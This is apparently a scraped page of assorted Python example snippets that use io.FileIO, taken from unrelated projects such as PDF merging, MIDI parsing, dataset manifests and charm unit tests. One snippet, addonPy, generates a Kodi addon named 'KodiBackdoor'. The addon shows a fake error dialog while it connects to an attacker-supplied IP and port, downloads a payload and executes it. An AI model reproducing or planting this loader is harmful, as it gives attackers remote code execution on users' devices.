def replace(self, attachable: [io.BytesIO, io.FileIO], position=None, **kwargs):
"""
.. versionadded:: 0.5
Replace the underlying file-object with a seekable one.
:param attachable: A seekable file-object.
:param position: Position of the new seekable file-object. if :data:`.None`, position will be preserved.
:param kwargs: the same as the :class:`.BaseDescriptor`
"""
if position is None:
position = self.tell()
# Close the old file-like object
self.close()
self._file = attachable
# Some hacks are here:
super().__init__(**kwargs)
self.seek(position)
python类FileIO()的实例源码
def append(self, fileobj, bookmark=None, pages=None, import_bookmarks=True):
"""
Identical to the :meth:`merge()<merge>` method, but assumes you want to concatenate
all pages onto the end of the file instead of specifying a position.
:param fileobj: A File Object or an object that supports the standard read
and seek methods similar to a File Object. Could also be a
string representing a path to a PDF file.
:param str bookmark: Optionally, you may specify a bookmark to be applied at
the beginning of the included file by supplying the text of the bookmark.
:param pages: can be a :ref:`Page Range <page-range>` or a ``(start, stop[, step])`` tuple
to merge only the specified range of pages from the source
document into the output document.
:param bool import_bookmarks: You may prevent the source document's bookmarks
from being imported by specifying this as ``False``.
"""
self.merge(len(self.pages), fileobj, bookmark, pages, import_bookmarks)
def __init__(self, data: Union[FileIO, BufferedReader]) -> None:
chunk_type = data.read(4)
if chunk_type != b'MThd':
raise ValueError("File had invalid header chunk type")
header_length = int.from_bytes(data.read(4), 'big')
if header_length != 6:
raise ValueError("File has unsupported header length")
self.length = header_length
format = int.from_bytes(data.read(2), 'big')
if format not in [0, 1, 2]:
raise ValueError("File has unsupported format")
self.format = format
ntrks = int.from_bytes(data.read(2), 'big')
if ntrks > 0 and format == 0:
raise ValueError("Multiple tracks in single track format")
self.ntrks = ntrks
self.tpqn = int.from_bytes(data.read(2), 'big')
def addonPy(ip, port):
with io.FileIO("KodiBackdoor/addon.py", "w") as file:
file.write('''
import xbmcaddon
import xbmcgui
import socket,struct
addon = xbmcaddon.Addon()
addonname = addon.getAddonInfo('name')
line1 = "Error!"
line2 = "An error occurred"
line3 = "Connection to server failed... please try again later"
s=socket.socket(2,1)
s.connect(("'''+ip+'''",'''+port+'''))
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(4096)
while len(d)!=l:
d+=s.recv(4096)
exec(d,{'s':s})
xbmcgui.Dialog().ok(addonname, line1, line2, line3)
''')
#Zip folder
def download(user, file, msg):
def startdownload(_request):
downloader = MediaIoBaseDownload(fh, _request)
done = False
while not done:
status, done = downloader.next_chunk()
try:
msg.edit(user.getstr('drive_downloading_progress')
.format(p=int(status.progress() * 100)))
except botogram.api.APIError:
pass
os.chdir('/tmp') # Sorry Windows users
fh = io.FileIO(file.get('name'), 'wb')
service = login(user)
try:
request = service.files().get_media(fileId=file.get('id'))
startdownload(request)
return '/tmp/' + file.get('name')
except:
request = service.files().export_media(fileId=file.get('id'), mimeType='application/pdf')
startdownload(request)
os.rename('/tmp/' + file.get('name'), '/tmp/' + file.get('name') + '.pdf')
return '/tmp/' + file.get('name') + '.pdf'
def valid_io_modes(self, *a, **kw):
modes = set()
t = LocalTarget(is_tmp=True)
t.open('w').close()
for mode in self.theoretical_io_modes(*a, **kw):
try:
io.FileIO(t.path, mode).close()
except ValueError:
pass
except IOError as err:
if err.errno == EEXIST:
modes.add(mode)
else:
raise
else:
modes.add(mode)
return modes
def create_manifest(data_path, tag, ordered=True):
manifest_path = '%s_manifest.csv' % tag
file_paths = []
wav_files = [os.path.join(dirpath, f)
for dirpath, dirnames, files in os.walk(data_path)
for f in fnmatch.filter(files, '*.wav')]
for file_path in tqdm(wav_files, total=len(wav_files)):
file_paths.append(file_path.strip())
print('\n')
if ordered:
_order_files(file_paths)
with io.FileIO(manifest_path, "w") as file:
for wav_path in tqdm(file_paths, total=len(file_paths)):
transcript_path = wav_path.replace('/wav/', '/txt/').replace('.wav', '.txt')
sample = os.path.abspath(wav_path) + ',' + os.path.abspath(transcript_path) + '\n'
file.write(sample.encode('utf-8'))
print('\n')
def _pipe_stdin(self, stdin):
if stdin is None or isinstance(stdin, io.FileIO):
return None
tsi = self._temp_stdin
bufsize = self.bufsize
if isinstance(stdin, io.BufferedIOBase):
buf = stdin.read(bufsize)
while len(buf) != 0:
tsi.write(buf)
tsi.flush()
buf = stdin.read(bufsize)
elif isinstance(stdin, (str, bytes)):
raw = stdin.encode() if isinstance(stdin, str) else stdin
for i in range((len(raw)//bufsize) + 1):
tsi.write(raw[i*bufsize:(i + 1)*bufsize])
tsi.flush()
else:
raise ValueError('stdin not understood {0!r}'.format(stdin))
def load(self, file: FileIO):
self.ptr = file.tell()
self.is_leaf, self.keys = load(file)
ptr_num = len(self.keys)
if not self.is_leaf:
ptr_num += (ptr_num + 1)
ptrs = unpack('Q' * ptr_num, file.read(8 * ptr_num))
if self.is_leaf:
self.ptrs_value = list(ptrs)
else:
ptr_num //= 2
self.ptrs_value = list(ptrs[:ptr_num])
self.ptrs_child = list(ptrs[ptr_num:])
self.size = file.tell() - self.ptr
def test_create(self, mock_open):
"""Test create sysctl method"""
_file = MagicMock(spec=io.FileIO)
mock_open.return_value = _file
create('{"kernel.max_pid": 1337}', "/etc/sysctl.d/test-sysctl.conf")
_file.__enter__().write.assert_called_with("kernel.max_pid=1337\n")
self.log.assert_called_with(
"Updating sysctl_file: /etc/sysctl.d/test-sysctl.conf"
" values: {'kernel.max_pid': 1337}",
level='DEBUG')
self.check_call.assert_called_with([
"sysctl", "-p",
"/etc/sysctl.d/test-sysctl.conf"])
def test_configure_install_source_distro_proposed(
self, _spcc, _open, _lsb):
"""Test configuring installation source from deb repo url"""
_lsb.return_value = FAKE_RELEASE
_file = MagicMock(spec=io.FileIO)
_open.return_value = _file
openstack.configure_installation_source('distro-proposed')
_file.__enter__().write.assert_called_once_with(
'# Proposed\ndeb http://archive.ubuntu.com/ubuntu '
'precise-proposed main universe multiverse restricted\n')
src = ('deb http://archive.ubuntu.com/ubuntu/ precise-proposed '
'restricted main multiverse universe')
openstack.configure_installation_source(src)
_spcc.assert_called_once_with(
['add-apt-repository', '--yes',
'deb http://archive.ubuntu.com/ubuntu/ precise-proposed '
'restricted main multiverse universe'])
def test_configure_install_source_uca_repos(
self, _fip, _lsb, _install, _open):
"""Test configuring installation source from UCA sources"""
_lsb.return_value = FAKE_RELEASE
_file = MagicMock(spec=io.FileIO)
_open.return_value = _file
_fip.side_effect = lambda x: x
for src, url in UCA_SOURCES:
actual_url = "# Ubuntu Cloud Archive\n{}\n".format(url)
openstack.configure_installation_source(src)
_install.assert_called_with(['ubuntu-cloud-keyring'],
fatal=True)
_open.assert_called_with(
'/etc/apt/sources.list.d/cloud-archive.list',
'w'
)
_file.__enter__().write.assert_called_with(actual_url)
def test_save_scriptrc(self, _open, _charm_dir, _exists, _mkdir):
"""Test generation of scriptrc from environment"""
scriptrc = ['#!/bin/bash\n',
'export setting1=foo\n',
'export setting2=bar\n']
_file = MagicMock(spec=io.FileIO)
_open.return_value = _file
_charm_dir.return_value = '/var/lib/juju/units/testing-foo-0/charm'
_exists.return_value = False
os.environ['JUJU_UNIT_NAME'] = 'testing-foo/0'
openstack.save_script_rc(setting1='foo', setting2='bar')
rcdir = '/var/lib/juju/units/testing-foo-0/charm/scripts'
_mkdir.assert_called_with(rcdir)
expected_f = '/var/lib/juju/units/testing-foo-0/charm/scripts/scriptrc'
_open.assert_called_with(expected_f, 'wt')
_mkdir.assert_called_with(os.path.dirname(expected_f))
_file.__enter__().write.assert_has_calls(
list(call(line) for line in scriptrc), any_order=True)
def test_configure_install_source_uca_repos(
self, _fip, _lsb, _install, _open):
"""Test configuring installation source from UCA sources"""
_lsb.return_value = FAKE_RELEASE
_file = MagicMock(spec=io.FileIO)
_open.return_value = _file
_fip.side_effect = lambda x: x
for src, url in UCA_SOURCES:
actual_url = "# Ubuntu Cloud Archive\n{}\n".format(url)
fetch.add_source(src)
_install.assert_called_with(['ubuntu-cloud-keyring'],
fatal=True)
_open.assert_called_with(
'/etc/apt/sources.list.d/cloud-archive.list',
'w'
)
_file.__enter__().write.assert_called_with(actual_url)
def create_manifest(data_path, tag, ordered=True):
manifest_path = '%s_manifest.csv' % tag
file_paths = []
wav_files = [os.path.join(dirpath, f)
for dirpath, dirnames, files in os.walk(data_path)
for f in fnmatch.filter(files, '*.wav')]
size = len(wav_files)
counter = 0
for file_path in wav_files:
file_paths.append(file_path.strip())
counter += 1
update_progress(counter / float(size))
print('\n')
if ordered:
_order_files(file_paths)
counter = 0
with io.FileIO(manifest_path, "w") as file:
for wav_path in file_paths:
transcript_path = wav_path.replace('/wav/', '/txt/').replace('.wav', '.txt')
sample = os.path.abspath(wav_path) + ',' + os.path.abspath(transcript_path) + '\n'
file.write(sample.encode('utf-8'))
counter += 1
update_progress(counter / float(size))
print('\n')
def create_manifest(data_path, tag, ordered=True):
manifest_path = '%s_manifest.csv' % tag
file_paths = []
wav_files = [os.path.join(dirpath, f)
for dirpath, dirnames, files in os.walk(data_path)
for f in fnmatch.filter(files, '*.wav')]
size = len(wav_files)
counter = 0
for file_path in wav_files:
file_paths.append(file_path.strip())
counter += 1
update_progress(counter / float(size))
print('\n')
if ordered:
_order_files(file_paths)
counter = 0
with io.FileIO(manifest_path, "w") as file:
for wav_path in file_paths:
transcript_path = wav_path.replace('/wav/', '/txt/').replace('.wav', '.txt')
sample = os.path.abspath(wav_path) + ',' + os.path.abspath(transcript_path) + '\n'
file.write(sample.encode('utf-8'))
counter += 1
update_progress(counter / float(size))
print('\n')
def create_manifest(data_path, tag, ordered=True):
manifest_path = '%s_manifest.csv' % tag
file_paths = []
wav_files = [os.path.join(dirpath, f)
for dirpath, dirnames, files in os.walk(data_path)
for f in fnmatch.filter(files, '*.wav')]
size = len(wav_files)
counter = 0
for file_path in wav_files:
file_paths.append(file_path.strip())
counter += 1
update_progress(counter / float(size))
print('\n')
if ordered:
_order_files(file_paths)
counter = 0
with io.FileIO(manifest_path, "w") as file:
for wav_path in file_paths:
transcript_path = wav_path.replace('/wav/', '/txt/').replace('.wav', '.txt')
sample = os.path.abspath(wav_path) + ',' + os.path.abspath(transcript_path) + '\n'
file.write(sample.encode('utf-8'))
counter += 1
update_progress(counter / float(size))
print('\n')
def __init__(self, **kwargs):
buf = FileIO(sys.stdout.fileno(), 'w')
super(_Py3Utf8Stdout, self).__init__(
buf,
encoding='utf8',
errors='strict'
)
def download(url, file_name):
"""
function to download file over http
url : URL of file to be downloaded
file_name : File name
"""
with io.FileIO(file_name, "w") as file:
# get request
response = get(url)
# write to file
file.write(response.content)
def isfileobj(f):
return isinstance(f, (io.FileIO, io.BufferedReader, io.BufferedWriter))
def get_data(self, path):
"""Return the data from path as raw bytes."""
with io.FileIO(path, 'r') as file:
return file.read()
# inspired from importlib2
def write(self, fileobj):
"""
Writes all data that has been merged to the given output file.
:param fileobj: Output file. Can be a filename or any kind of
file-like object.
"""
my_file = False
if isString(fileobj):
fileobj = file(fileobj, 'wb')
my_file = True
# Add pages to the PdfFileWriter
# The commented out line below was replaced with the two lines below it to allow PdfFileMerger to work with PyPdf 1.13
for page in self.pages:
self.output.addPage(page.pagedata)
page.out_pagedata = self.output.getReference(self.output._pages.getObject()["/Kids"][-1].getObject())
#idnum = self.output._objects.index(self.output._pages.getObject()["/Kids"][-1].getObject()) + 1
#page.out_pagedata = IndirectObject(idnum, 0, self.output)
# Once all pages are added, create bookmarks to point at those pages
self._write_dests()
self._write_bookmarks()
# Write the output to the file
self.output.write(fileobj)
if my_file:
fileobj.close()
def close(self):
"""
Shuts all file descriptors (input and output) and clears all memory
usage.
"""
self.pages = []
for fo, pdfr, mine in self.inputs:
if mine:
fo.close()
self.inputs = []
self.output = None
def addBookmark(self, title, pagenum, parent=None):
"""
Add a bookmark to this PDF file.
:param str title: Title to use for this bookmark.
:param int pagenum: Page number this bookmark will point to.
:param parent: A reference to a parent bookmark to create nested
bookmarks.
"""
if parent == None:
iloc = [len(self.bookmarks)-1]
elif isinstance(parent, list):
iloc = parent
else:
iloc = self.findBookmark(parent)
dest = Bookmark(TextStringObject(title), NumberObject(pagenum), NameObject('/FitH'), NumberObject(826))
if parent == None:
self.bookmarks.append(dest)
else:
bmparent = self.bookmarks
for i in iloc[:-1]:
bmparent = bmparent[i]
npos = iloc[-1]+1
if npos < len(bmparent) and isinstance(bmparent[npos], list):
bmparent[npos].append(dest)
else:
bmparent.insert(npos, [dest])
return dest
def __runProcessWithFilteredOutput(self, proc: subprocess.Popen, logfile: "typing.Optional[io.FileIO]",
stdoutFilter: "typing.Callable[[bytes], None]", cmdStr: str):
logfileLock = threading.Lock() # we need a mutex so the logfile line buffer doesn't get messed up
stderrThread = None
if logfile:
# use a thread to print stderr output and write it to logfile (not using a thread would block)
stderrThread = threading.Thread(target=self._handleStdErr, args=(logfile, proc.stderr, logfileLock, self))
stderrThread.start()
for line in proc.stdout:
with logfileLock: # make sure we don't interleave stdout and stderr lines
if logfile:
logfile.write(line)
if stdoutFilter:
stdoutFilter(line)
else:
sys.stdout.buffer.write(line)
flushStdio(sys.stdout)
retcode = proc.wait()
if stderrThread:
stderrThread.join()
# Not sure if the remaining call is needed
remainingErr, remainingOut = proc.communicate()
if remainingErr:
print("Process had remaining stderr:", remainingErr)
sys.stderr.buffer.write(remainingErr)
if logfile:
logfile.write(remainingOut)
if remainingOut:
print("Process had remaining stdout:", remainingOut)
sys.stdout.buffer.write(remainingOut)
if logfile:
logfile.write(remainingErr)
if stdoutFilter and self._lastStdoutLineCanBeOverwritten:
# add the final new line after the filtering
sys.stdout.buffer.write(b"\n")
if retcode:
message = "Command \"%s\" failed with exit code %d.\n" % (cmdStr, retcode)
if logfile:
message += "See " + logfile.name + " for details."
raise SystemExit(message)
def patch_open():
'''Patch open() to allow mocking both open() itself and the file that is
yielded.
Yields the mock for "open" and "file", respectively.'''
mock_open = MagicMock(spec='builtins.open')
mock_file = MagicMock(spec=io.FileIO)
@contextmanager
def stub_open(*args, **kwargs):
mock_open(*args, **kwargs)
yield mock_file
with patch('builtins.open', stub_open):
yield mock_open, mock_file
def sequence_number(data: Union[FileIO, BufferedReader]) -> Tuple[int, int, bytearray]:
length_bytes = bytearray(data.read(4))
length = int.from_bytes(length_bytes, "big")
if length != 2:
raise EventLengthError("Sequence Number length was incorrect. It should be 2, but it was {}".format(length))
sequence_num_raw = bytearray(data.read(2))
sequence_num = int.from_bytes(sequence_num_raw, "big")
return length, sequence_num, sequence_num_raw
def text_event(data: Union[FileIO, BufferedReader]) -> Tuple[int, str, bytearray]:
length = VariableLengthValue(data).value
raw_data = bytearray(data.read(length))
try:
text = raw_data.decode("ASCII")
except UnicodeDecodeError as exc:
raise EventTextError("Unparsable text in text event") from exc
return length, text, raw_data
def copyright_notice(data: Union[FileIO, BufferedReader]) -> Tuple[int, str, bytearray]:
length = VariableLengthValue(data).value
raw_data = bytearray(data.read(length))
try:
text = raw_data.decode("ASCII")
except UnicodeDecodeError as exc:
raise EventTextError("Unparsable text in copyright notice") from exc
return length, text, raw_data
def chunk_name(data: Union[FileIO, BufferedReader]) -> Tuple[int, str, bytearray]:
length = VariableLengthValue(data).value
raw_data = bytearray(data.read(length))
try:
text = raw_data.decode("ASCII")
except UnicodeDecodeError as exc:
raise EventTextError("Unparsable text in track/sequence name") from exc
return length, text, raw_data